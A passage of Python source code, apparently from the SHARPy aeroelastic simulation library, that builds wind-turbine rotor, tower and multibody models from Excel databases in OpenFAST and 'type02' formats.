excel_sheet_airfoil_coord = 'airfoil_coord',
m_distribution = 'uniform',
h5_cross_sec_prop = None,
n_points_camber = 100,
tol_remove_points = 1e-3):
"""
rotor_from_OpenFAST_db
Function needed to generate a rotor from an excel database according to OpenFAST inputs
Args:
chord_panels (int): Number of panels on the blade surface in the chord direction
rotation_velocity (float): Rotation velocity of the rotor
pitch_deg (float): pitch angle in degrees
excel_file_name (str): path to the excel database file
excel_sheet_structural_blade (str): name of the excel sheet with the blade structural properties
excel_sheet_aero_blade (str): name of the excel sheet with the blade aerodynamic properties
excel_sheet_airfoil_coord (str): name of the excel sheet with the airfoil coordinates
excel_sheet_parameters (str): name of the excel sheet with the global parameters
h5_cross_sec_prop (str): h5 containing mass and stiffness matrices along the blade.
m_distribution (str): chordwise panel distribution (e.g. 'uniform')
n_points_camber (int): number of points to define the camber of the airfoil
tol_remove_points (float): maximum distance to remove adjacent points
Returns:
rotor (sharpy.utils.generate_cases.AeroelasticInformation): Aeroelastic information of the rotor
Note:
- h5_cross_sec_prop is a path to a h5 containing the following groups:
- str_prop: with:
- K: list of 6x6 stiffness matrices
- M: list of 6x6 mass matrices
- radius: radial location (including hub) of K and M matrices
- when h5_cross_sec_prop is not None, mass and stiffness properties are
interpolated at BlFract location specified in "excel_sheet_structural_blade"
"""
######################################################################
## BLADE
######################################################################
blade = gc.AeroelasticInformation()
######################################################################
### STRUCTURE
######################################################################
# Read blade structural information from excel file
BlFract = gc.read_column_sheet_type01(excel_file_name, excel_sheet_structural_blade, 'BlFract')
PitchAxis = gc.read_column_sheet_type01(excel_file_name, excel_sheet_structural_blade, 'PitchAxis')
# TODO: implement pitch axis
# print("WARNING: PitchAxis not implemented")
# StrcTwst= gc.read_column_sheet_type01(excel_file_name, excel_sheet_structural_blade, 'StrcTwst')*deg2rad
BMassDen= gc.read_column_sheet_type01(excel_file_name, excel_sheet_structural_blade, 'BMassDen')
FlpStff= gc.read_column_sheet_type01(excel_file_name, excel_sheet_structural_blade, 'FlpStff')
EdgStff = gc.read_column_sheet_type01(excel_file_name, excel_sheet_structural_blade, 'EdgStff')
# Missing the following variables
GJStff = gc.read_column_sheet_type01(excel_file_name, excel_sheet_structural_blade, 'GJStff')
EAStff = gc.read_column_sheet_type01(excel_file_name, excel_sheet_structural_blade, 'EAStff')
Alpha = gc.read_column_sheet_type01(excel_file_name, excel_sheet_structural_blade, 'Alpha')
FlpIner= gc.read_column_sheet_type01(excel_file_name, excel_sheet_structural_blade, 'FlpIner')
EdgIner= gc.read_column_sheet_type01(excel_file_name, excel_sheet_structural_blade, 'EdgIner')
#PrecrvRef = gc.read_column_sheet_type01(excel_file_name, excel_sheet_structural_blade, 'PrecrvRef')
#PreswpRef = gc.read_column_sheet_type01(excel_file_name, excel_sheet_structural_blade, 'PreswpRef')
FlpcgOf = gc.read_column_sheet_type01(excel_file_name, excel_sheet_structural_blade, 'FlpcgOf')
EdgcgOf = gc.read_column_sheet_type01(excel_file_name, excel_sheet_structural_blade, 'EdgcgOf')
FlpEAOf = gc.read_column_sheet_type01(excel_file_name, excel_sheet_structural_blade, 'FlpEAOf')
EdgEAOf = gc.read_column_sheet_type01(excel_file_name, excel_sheet_structural_blade, 'EdgEAOf')
# From the aerodynamic sheet
excel_aero_r = gc.read_column_sheet_type01(excel_file_name, excel_sheet_aero_blade, 'BlSpn')
BlCrvAC = gc.read_column_sheet_type01(excel_file_name, excel_sheet_aero_blade, 'BlCrvAC')
BlSwpAC = gc.read_column_sheet_type01(excel_file_name, excel_sheet_aero_blade, 'BlSwpAC')
BlCrvAng = gc.read_column_sheet_type01(excel_file_name, excel_sheet_aero_blade, 'BlCrvAng')
if not (BlCrvAng == 0.).all():
# TODO: implement this angle
print("ERROR: BlCrvAng not implemented, assumed to be zero")
BlTwist = gc.read_column_sheet_type01(excel_file_name, excel_sheet_aero_blade, 'BlTwist')*deg2rad
# Blade parameters
TipRad = gc.read_column_sheet_type01(excel_file_name, excel_sheet_parameters, 'TipRad')
HubRad = gc.read_column_sheet_type01(excel_file_name, excel_sheet_parameters, 'HubRad')
# Interpolate excel variables into the correct locations
# Geometry
Radius = HubRad + BlFract*(TipRad - HubRad)
excel_aero_r += HubRad
include_hub_node = True
if include_hub_node:
Radius = np.concatenate((np.array([0.]), Radius),)
PitchAxis = np.concatenate((np.array([PitchAxis[0]]), PitchAxis),)
BMassDen = np.concatenate((np.array([BMassDen[0]]), BMassDen),)
FlpStff = np.concatenate((np.array([FlpStff[0]]), FlpStff),)
EdgStff = np.concatenate((np.array([EdgStff[0]]), EdgStff),)
GJStff = np.concatenate((np.array([GJStff[0]]), GJStff),)
EAStff = np.concatenate((np.array([EAStff[0]]), EAStff),)
Alpha = np.concatenate((np.array([Alpha[0]]), Alpha),)
FlpIner = np.concatenate((np.array([FlpIner[0]]), FlpIner),)
EdgIner = np.concatenate((np.array([EdgIner[0]]), EdgIner),)
FlpcgOf = np.concatenate((np.array([FlpcgOf[0]]), FlpcgOf),)
EdgcgOf = np.concatenate((np.array([EdgcgOf[0]]), EdgcgOf),)
FlpEAOf = np.concatenate((np.array([FlpEAOf[0]]), FlpEAOf),)
EdgEAOf = np.concatenate((np.array([EdgEAOf[0]]), EdgEAOf),)
# Base parameters
use_excel_struct_as_elem = False
if use_excel_struct_as_elem:
blade.StructuralInformation.num_node_elem = 3
blade.StructuralInformation.num_elem = len(Radius) - 2
blade.StructuralInformation.compute_basic_num_node()
node_r, elem_r = create_node_radial_pos_from_elem_centres(Radius,
blade.StructuralInformation.num_node,
blade.StructuralInformation.num_elem,
blade.StructuralInformation.num_node_elem)
else:
# Use excel struct as nodes
# Check the number of nodes
blade.StructuralInformation.num_node_elem = 3
blade.StructuralInformation.num_node = len(Radius)
if ((len(Radius) - 1) % (blade.StructuralInformation.num_node_elem - 1)) == 0:
blade.StructuralInformation.num_elem = int((len(Radius) - 1)/(blade.StructuralInformation.num_node_elem - 1))
node_r = Radius
elem_r = Radius[1::2] + 0.
else:
print("ERROR: Cannot build ", blade.StructuralInformation.num_node_elem, "-noded elements from ", blade.StructuralInformation.num_node, "nodes")
# TODO: how is this defined now?
node_prebending = np.interp(node_r,excel_aero_r,BlCrvAC)
# node_presweept = np.interp(node_r,excel_aero_r,BlSwpAC)
print("WARNING: Check the implementation for presweept blades")
node_presweept = np.zeros_like(node_r)
# node_structural_twist = -1.0*np.interp(node_r,Radius,StrcTwst)
node_structural_twist = -1.0*np.interp(node_r,excel_aero_r,BlTwist)
node_pitch_axis = np.interp(node_r,Radius,PitchAxis)
coordinates = create_blade_coordinates(blade.StructuralInformation.num_node, node_r, node_prebending, node_presweept)
if h5_cross_sec_prop is None:
# Stiffness
elem_EA = np.interp(elem_r,Radius,EAStff)
elem_EIy = np.interp(elem_r,Radius,FlpStff)
elem_EIz = np.interp(elem_r,Radius,EdgStff)
elem_GJ = np.interp(elem_r,Radius,GJStff)
# Stiffness: estimate unknown properties
print('WARNING: The Poisson coefficient is assumed equal to 0.3')
print('WARNING: The cross-section area is used as the shear area')
poisson_coef = 0.3
elem_GAy = elem_EA/2.0/(1.0+poisson_coef)
elem_GAz = elem_EA/2.0/(1.0+poisson_coef)
# Inertia
# TODO: check yz axis and Flap-edge
elem_pos_cg_B = np.zeros((blade.StructuralInformation.num_elem,3),)
elem_pos_cg_B[:,2]=np.interp(elem_r,Radius,FlpcgOf)
elem_pos_cg_B[:,1]=np.interp(elem_r,Radius,EdgcgOf)
elem_mass_per_unit_length = np.interp(elem_r,Radius,BMassDen)
elem_mass_iner_y = np.interp(elem_r,Radius,FlpIner)
elem_mass_iner_z = np.interp(elem_r,Radius,EdgIner)
# Inertia: estimate unknown properties
print('WARNING: Using perpendicular axis theorem to compute the inertia around xB')
elem_mass_iner_x = elem_mass_iner_y + elem_mass_iner_z
# Generate blade structural properties
blade.StructuralInformation.create_mass_db_from_vector(elem_mass_per_unit_length, elem_mass_iner_x, elem_mass_iner_y, elem_mass_iner_z, elem_pos_cg_B)
blade.StructuralInformation.create_stiff_db_from_vector(elem_EA, elem_GAy, elem_GAz, elem_GJ, elem_EIy, elem_EIz)
else: # read Mass/Stiffness from database
cross_prop=h5.readh5(h5_cross_sec_prop).str_prop
# create mass_db/stiffness_db (interpolate at mid-node of each element)
blade.StructuralInformation.mass_db = scint.interp1d(
cross_prop.radius, cross_prop.M, kind='cubic', copy=False, assume_sorted=True, axis=0)(node_r[1::2])
blade.StructuralInformation.stiffness_db = scint.interp1d(
cross_prop.radius, cross_prop.K, kind='cubic', copy=False, assume_sorted=True, axis=0)(node_r[1::2])
blade.StructuralInformation.generate_1to1_from_vectors(
num_node_elem = blade.StructuralInformation.num_node_elem,
num_node = blade.StructuralInformation.num_node,
num_elem = blade.StructuralInformation.num_elem,
coordinates = coordinates,
stiffness_db = blade.StructuralInformation.stiffness_db,
mass_db = blade.StructuralInformation.mass_db,
frame_of_reference_delta = 'y_AFoR',
vec_node_structural_twist = node_structural_twist,
num_lumped_mass = 0)
# Boundary conditions
blade.StructuralInformation.boundary_conditions = np.zeros((blade.StructuralInformation.num_node), dtype = int)
blade.StructuralInformation.boundary_conditions[0] = 1
blade.StructuralInformation.boundary_conditions[-1] = -1
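# SHARPy boundary-condition convention: 1 marks a clamped node (blade root),
# -1 a free end (blade tip) and 0 an interior node.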
######################################################################
### AERODYNAMICS
######################################################################
# Read blade aerodynamic information from excel file
# excel_aerodynamic_twist = gc.read_column_sheet_type01(excel_file_name, excel_sheet_aero_blade, 'BlTwist')*deg2rad
excel_chord = gc.read_column_sheet_type01(excel_file_name, excel_sheet_aero_blade, 'BlChord')
pure_airfoils_names = gc.read_column_sheet_type01(excel_file_name, excel_sheet_aero_blade, 'BlAFID')
# Read coordinates of the pure airfoils
n_elem_aero = len(excel_aero_r)
# TODO: replace this with a list of thicknesses and pure airfoils
pure_airfoils_camber=np.zeros((n_elem_aero,n_points_camber,2),)
xls = pd.ExcelFile(excel_file_name)
excel_db = pd.read_excel(xls, sheet_name=excel_sheet_airfoil_coord)
for iairfoil in range(len(pure_airfoils_names)):
# Look for the NaN
icoord=2
while(not(math.isnan(excel_db["%s_x" % pure_airfoils_names[iairfoil]][icoord]))):
icoord+=1
if(icoord==len(excel_db["%s_x" % pure_airfoils_names[iairfoil]])):
break
# Compute the camber of the airfoil
pure_airfoils_camber[iairfoil,:,0], pure_airfoils_camber[iairfoil,:,1] = gc.get_airfoil_camber(excel_db["%s_x" % pure_airfoils_names[iairfoil]][2:icoord] , excel_db["%s_y" % pure_airfoils_names[iairfoil]][2:icoord], n_points_camber)
# Basic variables
n_elem_aero = len(excel_aero_r)
num_airfoils = blade.StructuralInformation.num_node
surface_distribution = np.zeros((blade.StructuralInformation.num_elem), dtype=int)
# Interpolate in the correct positions
node_chord=np.interp(node_r, excel_aero_r, excel_chord)
# node_aero_twist = -1.0*(np.interp(node_r, excel_aero_r, excel_aerodynamic_twist) + node_structural_twist)
node_sweep = np.ones((blade.StructuralInformation.num_node), )*np.pi
# node_elastic_axis=np.ones((blade.StructuralInformation.num_node,))*0.25
# Define the nodes with aerodynamic properties
# Look for the first element that is going to be aerodynamic
first_aero_elem=0
while (elem_r[first_aero_elem]<=excel_aero_r[0]):
first_aero_elem+=1
first_aero_node=first_aero_elem*(blade.StructuralInformation.num_node_elem-1)
aero_node = np.zeros((blade.StructuralInformation.num_node,), dtype=bool)
aero_node[first_aero_node:]=np.ones((blade.StructuralInformation.num_node-first_aero_node,),dtype=bool)
airfoils = blade.AerodynamicInformation.interpolate_airfoils_camber(pure_airfoils_camber,excel_aero_r, node_r, n_points_camber)
# Write SHARPy format
airfoil_distribution = np.linspace(0,blade.StructuralInformation.num_node-1,blade.StructuralInformation.num_node, dtype=int)
blade.AerodynamicInformation.create_aerodynamics_from_vec(blade.StructuralInformation,
aero_node,
node_chord,
np.zeros_like(node_chord),
node_sweep,
chord_panels,
surface_distribution,
m_distribution,
node_pitch_axis,
airfoil_distribution,
airfoils)
######################################################################
## ROTOR
######################################################################
# Read from excel file
numberOfBlades = gc.read_column_sheet_type01(excel_file_name, excel_sheet_parameters, 'NumBl')
tilt = gc.read_column_sheet_type01(excel_file_name, excel_sheet_parameters, 'ShftTilt')*deg2rad
cone = gc.read_column_sheet_type01(excel_file_name, excel_sheet_parameters, 'Cone')*deg2rad
# pitch = gc.read_column_sheet_type01(excel_file_name, excel_sheet_rotor, 'Pitch')*deg2rad
# Apply pitch
blade.StructuralInformation.rotate_around_origin(np.array([1.,0.,0.]), -pitch_deg*deg2rad)
# Apply coning
blade.StructuralInformation.rotate_around_origin(np.array([0.,1.,0.]), -cone)
# Build the whole rotor
rotor = blade.copy()
for iblade in range(numberOfBlades-1):
blade2 = blade.copy()
blade2.StructuralInformation.rotate_around_origin(np.array([0.,0.,1.]), (iblade+1)*(360.0/numberOfBlades)*deg2rad)
rotor.assembly(blade2)
blade2 = None
rotor.remove_duplicated_points(tol_remove_points)
# Apply tilt
rotor.StructuralInformation.rotate_around_origin(np.array([0.,1.,0.]), tilt)
return rotor
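# Hypothetical usage sketch (illustrative values, not from any database):
#
#   import numpy as np
#   rotor = rotor_from_OpenFAST_db(chord_panels=np.array([8], dtype=int),
#                                  rotation_velocity=1.26,  # rad/s, assumed
#                                  pitch_deg=0.,
#                                  excel_file_name='database_OpenFAST.xlsx')
#
# The returned AeroelasticInformation already contains the pitched, coned and
# tilted rotor with all blades assembled.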
def generate_from_OpenFAST_db(chord_panels,
rotation_velocity,
pitch_deg,
excel_file_name= 'database_OpenFAST.xlsx',
excel_sheet_parameters = 'parameters',
excel_sheet_structural_blade = 'structural_blade',
excel_sheet_aero_blade = 'aero_blade',
excel_sheet_airfoil_coord = 'airfoil_coord',
excel_sheet_structural_tower = 'structural_tower',
m_distribution = 'uniform',
n_points_camber = 100,
tol_remove_points = 1e-3):
"""
generate_from_OpenFAST_db
Function needed to generate a wind turbine from an excel database according to OpenFAST inputs
Args:
chord_panels (int): Number of panels on the blade surface in the chord direction
rotation_velocity (float): Rotation velocity of the rotor
pitch_deg (float): pitch angle in degrees
excel_file_name (str): path to the excel database file
excel_sheet_structural_blade (str): name of the excel sheet with the blade structural properties
excel_sheet_aero_blade (str): name of the excel sheet with the blade aerodynamic properties
excel_sheet_airfoil_coord (str): name of the excel sheet with the airfoil coordinates
excel_sheet_parameters (str): name of the excel sheet with the global parameters
excel_sheet_structural_tower (str): name of the excel sheet with the tower structural properties
m_distribution (str): chordwise panel distribution (e.g. 'uniform')
n_points_camber (int): number of points to define the camber of the airfoil,
tol_remove_points (float): maximum distance to remove adjacent points
Returns:
wt (sharpy.utils.generate_cases.AeroelasticInformation): Aeroelastic information of the wind turbine
LC (list): list of all the Lagrange constraints needed in the cases (sharpy.utils.generate_cases.LagrangeConstraint)
MB (list): list of the multibody information of each body (sharpy.utils.generate_cases.BodyInformation)
"""
rotor = rotor_from_OpenFAST_db(chord_panels,
rotation_velocity,
pitch_deg,
excel_file_name= excel_file_name,
excel_sheet_parameters = excel_sheet_parameters,
excel_sheet_structural_blade = excel_sheet_structural_blade,
excel_sheet_aero_blade = excel_sheet_aero_blade,
excel_sheet_airfoil_coord = excel_sheet_airfoil_coord,
m_distribution = m_distribution,
n_points_camber = n_points_camber,
tol_remove_points = tol_remove_points)
######################################################################
## TOWER
######################################################################
# Read from excel file
HtFract = gc.read_column_sheet_type01(excel_file_name, excel_sheet_structural_tower, 'HtFract')
TMassDen = gc.read_column_sheet_type01(excel_file_name, excel_sheet_structural_tower, 'TMassDen')
TwFAStif = gc.read_column_sheet_type01(excel_file_name, excel_sheet_structural_tower, 'TwFAStif')
TwSSStif = gc.read_column_sheet_type01(excel_file_name, excel_sheet_structural_tower, 'TwSSStif')
# TODO> variables to be defined
TwGJStif = gc.read_column_sheet_type01(excel_file_name, excel_sheet_structural_tower, 'TwGJStif')
TwEAStif = gc.read_column_sheet_type01(excel_file_name, excel_sheet_structural_tower, 'TwEAStif')
TwFAIner = gc.read_column_sheet_type01(excel_file_name, excel_sheet_structural_tower, 'TwFAIner')
TwSSIner = gc.read_column_sheet_type01(excel_file_name, excel_sheet_structural_tower, 'TwSSIner')
TwFAcgOf = gc.read_column_sheet_type01(excel_file_name, excel_sheet_structural_tower, 'TwFAcgOf')
TwSScgOf = gc.read_column_sheet_type01(excel_file_name, excel_sheet_structural_tower, 'TwSScgOf')
# Define the TOWER
TowerHt = gc.read_column_sheet_type01(excel_file_name, excel_sheet_parameters, 'TowerHt')
Elevation = TowerHt*HtFract
tower = gc.AeroelasticInformation()
tower.StructuralInformation.num_elem = len(Elevation) - 2
tower.StructuralInformation.num_node_elem = 3
tower.StructuralInformation.compute_basic_num_node()
# Interpolate excel variables into the correct locations
node_r, elem_r = create_node_radial_pos_from_elem_centres(Elevation,
tower.StructuralInformation.num_node,
tower.StructuralInformation.num_elem,
tower.StructuralInformation.num_node_elem)
# Stiffness
elem_EA = np.interp(elem_r,Elevation,TwEAStif)
elem_EIz = np.interp(elem_r,Elevation,TwSSStif)
elem_EIy = np.interp(elem_r,Elevation,TwFAStif)
elem_GJ = np.interp(elem_r,Elevation,TwGJStif)
# Stiffness: estimate unknown properties
print('WARNING: The Poisson coefficient is assumed equal to 0.3')
print('WARNING: The cross-section area is used as the shear area')
poisson_coef = 0.3
elem_GAy = elem_EA/2.0/(1.0+poisson_coef)
elem_GAz = elem_EA/2.0/(1.0+poisson_coef)
# Inertia
elem_mass_per_unit_length = np.interp(elem_r,Elevation,TMassDen)
elem_mass_iner_y = np.interp(elem_r,Elevation,TwFAIner)
elem_mass_iner_z = np.interp(elem_r,Elevation,TwSSIner)
# TODO: check yz axis and Flap-edge
elem_pos_cg_B = np.zeros((tower.StructuralInformation.num_elem,3),)
elem_pos_cg_B[:,1]=np.interp(elem_r,Elevation,TwSScgOf)
elem_pos_cg_B[:,2]=np.interp(elem_r,Elevation,TwFAcgOf)
# Inertia: estimate unknown properties
print('WARNING: Using perpendicular axis theorem to compute the inertia around xB')
elem_mass_iner_x = elem_mass_iner_y + elem_mass_iner_z
# Create the tower
tower.StructuralInformation.create_mass_db_from_vector(elem_mass_per_unit_length, elem_mass_iner_x, elem_mass_iner_y, elem_mass_iner_z, elem_pos_cg_B)
tower.StructuralInformation.create_stiff_db_from_vector(elem_EA, elem_GAy, elem_GAz, elem_GJ, elem_EIy, elem_EIz)
coordinates = np.zeros((tower.StructuralInformation.num_node,3),)
coordinates[:,0] = node_r
tower.StructuralInformation.generate_1to1_from_vectors(
num_node_elem = tower.StructuralInformation.num_node_elem,
num_node = tower.StructuralInformation.num_node,
num_elem = tower.StructuralInformation.num_elem,
coordinates = coordinates,
stiffness_db = tower.StructuralInformation.stiffness_db,
mass_db = tower.StructuralInformation.mass_db,
frame_of_reference_delta = 'y_AFoR',
vec_node_structural_twist = np.zeros((tower.StructuralInformation.num_node,),),
num_lumped_mass = 1)
tower.StructuralInformation.boundary_conditions = np.zeros((tower.StructuralInformation.num_node), dtype = int)
tower.StructuralInformation.boundary_conditions[0] = 1
# Read overhang and nacelle properties from excel file
overhang_len = gc.read_column_sheet_type01(excel_file_name, excel_sheet_parameters, 'overhang')
# HubMass = gc.read_column_sheet_type01(excel_file_name, excel_sheet_nacelle, 'HubMass')
NacelleMass = gc.read_column_sheet_type01(excel_file_name, excel_sheet_parameters, 'NacMass')
# NacelleYawIner = gc.read_column_sheet_type01(excel_file_name, excel_sheet_nacelle, 'NacelleYawIner')
# Include nacelle mass
tower.StructuralInformation.lumped_mass_nodes = np.array([tower.StructuralInformation.num_node-1], dtype=int)
tower.StructuralInformation.lumped_mass = np.array([NacelleMass], dtype=float)
tower.AerodynamicInformation.set_to_zero(tower.StructuralInformation.num_node_elem,
tower.StructuralInformation.num_node,
tower.StructuralInformation.num_elem)
# Assemble the overhang with the tower
# numberOfBlades = gc.read_column_sheet_type01(excel_file_name, excel_sheet_parameters, 'NumBl')
tilt = gc.read_column_sheet_type01(excel_file_name, excel_sheet_parameters, 'ShftTilt')*deg2rad
# cone = gc.read_column_sheet_type01(excel_file_name, excel_sheet_parameters, 'Cone')*deg2rad
overhang = gc.AeroelasticInformation()
overhang.StructuralInformation.num_node = 3
overhang.StructuralInformation.num_node_elem = 3
overhang.StructuralInformation.compute_basic_num_elem()
node_pos = np.zeros((overhang.StructuralInformation.num_node,3), )
node_pos[:,0] += tower.StructuralInformation.coordinates[-1,0]
# 'tilt' is already in radians; do not multiply by deg2rad again
node_pos[:,0] += np.linspace(0., overhang_len*np.sin(tilt), overhang.StructuralInformation.num_node)
node_pos[:,2] = np.linspace(0., -overhang_len*np.cos(tilt), overhang.StructuralInformation.num_node)
# TODO: replace the following with real values
# Same properties as the last element of the tower
print("WARNING: Using the structural properties of the last tower section for the overhang")
oh_mass_per_unit_length = tower.StructuralInformation.mass_db[-1,0,0]
oh_mass_iner = tower.StructuralInformation.mass_db[-1,3,3]
oh_EA = tower.StructuralInformation.stiffness_db[-1,0,0]
oh_GA = tower.StructuralInformation.stiffness_db[-1,1,1]
oh_GJ = tower.StructuralInformation.stiffness_db[-1,3,3]
oh_EI = tower.StructuralInformation.stiffness_db[-1,4,4]
overhang.StructuralInformation.generate_uniform_sym_beam(node_pos,
oh_mass_per_unit_length,
oh_mass_iner,
oh_EA,
oh_GA,
oh_GJ,
oh_EI,
num_node_elem = 3,
y_BFoR = 'y_AFoR',
num_lumped_mass=0)
overhang.StructuralInformation.boundary_conditions = np.zeros((overhang.StructuralInformation.num_node), dtype = int)
overhang.StructuralInformation.boundary_conditions[-1] = -1
overhang.AerodynamicInformation.set_to_zero(overhang.StructuralInformation.num_node_elem,
overhang.StructuralInformation.num_node,
overhang.StructuralInformation.num_elem)
tower.assembly(overhang)
tower.remove_duplicated_points(tol_remove_points)
######################################################################
## WIND TURBINE
######################################################################
# Assemble the whole case
wt = tower.copy()
hub_position = tower.StructuralInformation.coordinates[-1,:]
rotor.StructuralInformation.coordinates += hub_position
wt.assembly(rotor)
# Redefine the body numbers
wt.StructuralInformation.body_number *= 0
wt.StructuralInformation.body_number[tower.StructuralInformation.num_elem:wt.StructuralInformation.num_elem] += 1
######################################################################
## MULTIBODY
######################################################################
# Define the boundary condition between the rotor and the tower tip
LC1 = gc.LagrangeConstraint()
LC1.behaviour = 'hinge_node_FoR_constant_vel'
LC1.node_in_body = tower.StructuralInformation.num_node-1
LC1.body = 0
LC1.body_FoR = 1
LC1.rot_axisB = np.array([1.,0.,0.0])
LC1.rot_vel = -rotation_velocity
LC = []
LC.append(LC1)
# Define the multibody information for the tower and the rotor
MB1 = gc.BodyInformation()
MB1.body_number = 0
MB1.FoR_position = np.zeros((6,),)
MB1.FoR_velocity = np.zeros((6,),)
MB1.FoR_acceleration = np.zeros((6,),)
MB1.FoR_movement = 'prescribed'
MB1.quat = np.array([1.0,0.0,0.0,0.0])
MB2 = gc.BodyInformation()
MB2.body_number = 1
MB2.FoR_position = np.array([rotor.StructuralInformation.coordinates[0, 0], rotor.StructuralInformation.coordinates[0, 1], rotor.StructuralInformation.coordinates[0, 2], 0.0, 0.0, 0.0])
MB2.FoR_velocity = np.array([0.,0.,0.,0.,0.,rotation_velocity])
MB2.FoR_acceleration = np.zeros((6,),)
MB2.FoR_movement = 'free'
MB2.quat = algebra.euler2quat(np.array([0.0,tilt,0.0]))
MB = []
MB.append(MB1)
MB.append(MB2)
######################################################################
## RETURN
######################################################################
return wt, LC, MB
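# Hypothetical usage sketch (illustrative values): this generator wraps the
# rotor builder above and adds tower, overhang and multibody data.
#
#   wt, LC, MB = generate_from_OpenFAST_db(chord_panels=np.array([8], dtype=int),
#                                          rotation_velocity=1.26,  # rad/s, assumed
#                                          pitch_deg=0.)
#   # LC holds the rotor-tower hinge constraint, MB the two bodies
#   # (prescribed tower, free rotor frame of reference).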
######################################################################
# FROM excel type02
######################################################################
def rotor_from_excel_type02(chord_panels,
rotation_velocity,
pitch_deg,
excel_file_name= 'database_excel_type02.xlsx',
excel_sheet_parameters = 'parameters',
excel_sheet_structural_blade = 'structural_blade',
excel_sheet_discretization_blade = 'discretization_blade',
excel_sheet_aero_blade = 'aero_blade',
excel_sheet_airfoil_info = 'airfoil_info',
excel_sheet_airfoil_coord = 'airfoil_coord',
m_distribution = 'uniform',
h5_cross_sec_prop = None,
n_points_camber = 100,
tol_remove_points = 1e-3,
user_defined_m_distribution_type = None,
camber_effect_on_twist = False,
wsp = 0.,
dt = 0.):
"""
rotor_from_excel_type02
Function needed to generate a rotor from an excel database type02
Args:
chord_panels (int): Number of panels on the blade surface in the chord direction
rotation_velocity (float): Rotation velocity of the rotor
pitch_deg (float): pitch angle in degrees
excel_file_name (str): path to the excel database file
excel_sheet_structural_blade (str): name of the excel sheet with the blade structural properties
excel_sheet_discretization_blade (str): name of the excel sheet with the blade discretization
excel_sheet_aero_blade (str): name of the excel sheet with the blade aerodynamic properties
excel_sheet_airfoil_info (str): name of the excel sheet with the airfoil information
excel_sheet_airfoil_coord (str): name of the excel sheet with the airfoil coordinates
excel_sheet_parameters (str): name of the excel sheet with the global parameters
h5_cross_sec_prop (str): h5 containing mass and stiffness matrices along the blade.
m_distribution (str): chordwise panel distribution (e.g. 'uniform')
n_points_camber (int): number of points to define the camber of the airfoil
tol_remove_points (float): maximum distance to remove adjacent points
user_defined_m_distribution_type (str): type of user-defined chordwise panel distribution
camber_effect_on_twist (bool): if True, replace the airfoil camber by an equivalent twist and steady moment
wsp (float): wind speed (only used by the user-defined panel distribution)
dt (float): time step (only used by the user-defined panel distribution)
Returns:
rotor (sharpy.utils.generate_cases.AeroelasticInformation): Aeroelastic information of the rotor
Note:
- h5_cross_sec_prop is a path to a h5 containing the following groups:
- str_prop: with:
- K: list of 6x6 stiffness matrices
- M: list of 6x6 mass matrices
- radius: radial location (including hub) of K and M matrices
- when h5_cross_sec_prop is not None, mass and stiffness properties are
interpolated at BlFract location specified in "excel_sheet_structural_blade"
"""
######################################################################
## BLADE
######################################################################
blade = gc.AeroelasticInformation()
######################################################################
### STRUCTURE
######################################################################
# Read blade structural information from excel file
rR_structural = gc.read_column_sheet_type01(excel_file_name, excel_sheet_structural_blade, 'rR')
OutPElAxis = gc.read_column_sheet_type01(excel_file_name, excel_sheet_structural_blade, 'OutPElAxis')
InPElAxis = gc.read_column_sheet_type01(excel_file_name, excel_sheet_structural_blade, 'InPElAxis')
ElAxisAftLEc = gc.read_column_sheet_type01(excel_file_name, excel_sheet_structural_blade, 'ElAxisAftLEc')
StrcTwst = gc.read_column_sheet_type01(excel_file_name, excel_sheet_structural_blade, 'StrcTwst')*deg2rad
BMassDen = gc.read_column_sheet_type01(excel_file_name, excel_sheet_structural_blade, 'BMassDen')
FlpStff = gc.read_column_sheet_type01(excel_file_name, excel_sheet_structural_blade, 'FlpStff')
EdgStff = gc.read_column_sheet_type01(excel_file_name, excel_sheet_structural_blade, 'EdgStff')
FlapEdgeStiff = gc.read_column_sheet_type01(excel_file_name, excel_sheet_structural_blade, 'FlapEdgeStiff')
GJStff = gc.read_column_sheet_type01(excel_file_name, excel_sheet_structural_blade, 'GJStff')
EAStff = gc.read_column_sheet_type01(excel_file_name, excel_sheet_structural_blade, 'EAStff')
FlpIner = gc.read_column_sheet_type01(excel_file_name, excel_sheet_structural_blade, 'FlpIner')
EdgIner = gc.read_column_sheet_type01(excel_file_name, excel_sheet_structural_blade, 'EdgIner')
FlapEdgeIner = gc.read_column_sheet_type01(excel_file_name, excel_sheet_structural_blade, 'FlapEdgeIner')
PrebendRef = gc.read_column_sheet_type01(excel_file_name, excel_sheet_structural_blade, 'PrebendRef')
PreswpRef = gc.read_column_sheet_type01(excel_file_name, excel_sheet_structural_blade, 'PreswpRef')
OutPcg = gc.read_column_sheet_type01(excel_file_name, excel_sheet_structural_blade, 'OutPcg')
InPcg = gc.read_column_sheet_type01(excel_file_name, excel_sheet_structural_blade, 'InPcg')
# Blade parameters
TipRad = gc.read_column_sheet_type01(excel_file_name, excel_sheet_parameters, 'TipRad')
# HubRad = gc.read_column_sheet_type01(excel_file_name, excel_sheet_parameters, 'HubRad')
# Discretization points
rR = gc.read_column_sheet_type01(excel_file_name, excel_sheet_discretization_blade, 'rR')
# Interpolate excel variables into the correct locations
# Geometry
if rR[0] < rR_structural[0]:
rR_structural = np.concatenate((np.array([0.]), rR_structural),)
OutPElAxis = np.concatenate((np.array([OutPElAxis[0]]), OutPElAxis),)
InPElAxis = np.concatenate((np.array([InPElAxis[0]]), InPElAxis),)
ElAxisAftLEc = np.concatenate((np.array([ElAxisAftLEc[0]]), ElAxisAftLEc),)
StrcTwst = np.concatenate((np.array([StrcTwst[0]]), StrcTwst),)
BMassDen = np.concatenate((np.array([BMassDen[0]]), BMassDen),)
FlpStff = np.concatenate((np.array([FlpStff[0]]), FlpStff),)
EdgStff = np.concatenate((np.array([EdgStff[0]]), EdgStff),)
FlapEdgeStiff = np.concatenate((np.array([FlapEdgeStiff[0]]), FlapEdgeStiff),)
GJStff = np.concatenate((np.array([GJStff[0]]), GJStff),)
EAStff = np.concatenate((np.array([EAStff[0]]), EAStff),)
FlpIner = np.concatenate((np.array([FlpIner[0]]), FlpIner),)
EdgIner = np.concatenate((np.array([EdgIner[0]]), EdgIner),)
FlapEdgeIner = np.concatenate((np.array([FlapEdgeIner[0]]), FlapEdgeIner),)
PrebendRef = np.concatenate((np.array([PrebendRef[0]]), PrebendRef),)
PreswpRef = np.concatenate((np.array([PreswpRef[0]]), PreswpRef),)
OutPcg = np.concatenate((np.array([OutPcg[0]]), OutPcg),)
InPcg = np.concatenate((np.array([InPcg[0]]), InPcg),)
# Base parameters
use_excel_struct_as_elem = False
if use_excel_struct_as_elem:
blade.StructuralInformation.num_node_elem = 3
